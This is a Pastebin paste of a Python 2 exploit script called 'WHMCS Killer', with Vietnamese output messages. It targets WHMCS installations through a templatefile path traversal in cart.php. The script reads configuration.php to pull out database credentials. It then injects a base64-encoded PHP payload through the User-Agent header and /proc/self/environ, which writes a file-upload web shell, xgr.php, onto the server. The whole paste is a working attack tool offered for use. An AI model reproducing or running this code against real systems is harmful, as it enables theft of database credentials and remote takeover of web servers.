parkdream1

whmcs_vi.py

Apr 23rd, 2012
573
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.89 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Author: h3x4r
  3. # Messenger: h3x4r
  4. # Copyright to XgroupVn
  5. # http://xgrvn.net/XgR/
  6. # WHMCS killer
  7. # http://www.exploit-db.com/exploits/17999/
  8. # Shell upload via /proc/self/environ
  9. # Greets: To all members of XgroupVn !
  10.  
  11. import socket,sys,re
  12.  
  13. def main():
  14.     try:   
  15.         r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  16.         r.connect((target, port))
  17.         r.send("GET /"+path+"/cart.php?a=h3x4r&templatefile=../../../configuration.php%00 HTTP/1.0\r\n")
  18.         r.send("Host: "+target+"\r\n\r\n")
  19.         print "[*] Gui request thanh cong"
  20.         page = r.recv(1024)
  21.         fullpage = ""
  22.         while len(page):
  23.             fullpage = fullpage + page
  24.             page = r.recv(1024)
  25.         r.close()
  26.     except Exception, e:
  27.         print "[-] Khong the gui request"
  28.         print e
  29.         sys.exit(1)
  30.  
  31.     db_host = re.search("db_host =(.*);",fullpage)
  32.     db_username = re.search("db_username =(.*);",fullpage)
  33.     db_password = re.search("db_password =(.*);",fullpage)
  34.     db_name =re.search("db_name =(.*);",fullpage)
  35.     if db_host:
  36.         print "[*] Trang "+target+" nay co loi"
  37.         print "[*] Thong Tin Database"
  38.         print "Host: %s" % (db_host.group(1))
  39.         print "User: %s" % (db_username.group(1))
  40.         print "Pass: %s" % (db_password.group(1))
  41.         print "Db Name: %s" % (db_name.group(1))
  42.         hoi()
  43.     else:
  44.         print "[-] Trang "+target+" nay ko co loi"
  45.         sys.exit(1)
  46.  
  47. def hoi():
  48.     hoi = raw_input("[*] Ban co muon up shell:\nNhap yes de bat dau up shell: ")
  49.     if hoi == "yes":
  50.             upshell()
  51.     else:
  52.         sys.exit(1)
  53.  
  54. def upshell():
  55.     try:   
  56.         r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  57.         r.connect((target, port))
  58.         r.send("GET /"+path+"/cart.php?a=h3x4r&templatefile=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0\r\n")
  59.         r.send("User-Agent: {php}eval(base64_decode(' JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ3hnci5waHAnLCd3Jyk7DQpmd3JpdGUoJGZpY2hpZXIsICRjKTsNCmZjbG9zZSgkZmljaGllcik7'));exit;{/php}\r\n")
  60.         r.send("Host: "+target+"\r\n\r\n")
  61.         print "[*] Ok"
  62.         print "[*] Kiem Tra "+target+"/xgr.php"
  63.     except Exception, e:
  64.         print "[-] Up Shell that bai"
  65.         print e
  66.         sys.exit(1)
  67.  
  68. def banner():
  69.     print "\n"
  70.     print "****************************************************************************"
  71.     print "||                                WHMCS Killer v. 1.0                     ||"
  72.     print "||                                     by h3x4r                           ||"
  73.     print "||                               Copyright to XgroupVn                    ||"
  74.     print "||                         Fucking from " + target + " on port " + str(port) + "             ||"
  75.     print "****************************************************************************"
  76.     print "\n"
  77.  
  78. if __name__ == '__main__':
  79.     if len(sys.argv) != 4:
  80.         print >>sys.stderr, "Su Dung:", sys.argv[0], "<Target IP> <Port> <Path>"
  81.         print "Vi Du: python", sys.argv[0], "boxvps.com 80 client"
  82.         sys.exit(1)
  83.  
  84.     target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
  85.  
  86.     banner()
  87.     main()
Add Comment
Please, Sign In to add comment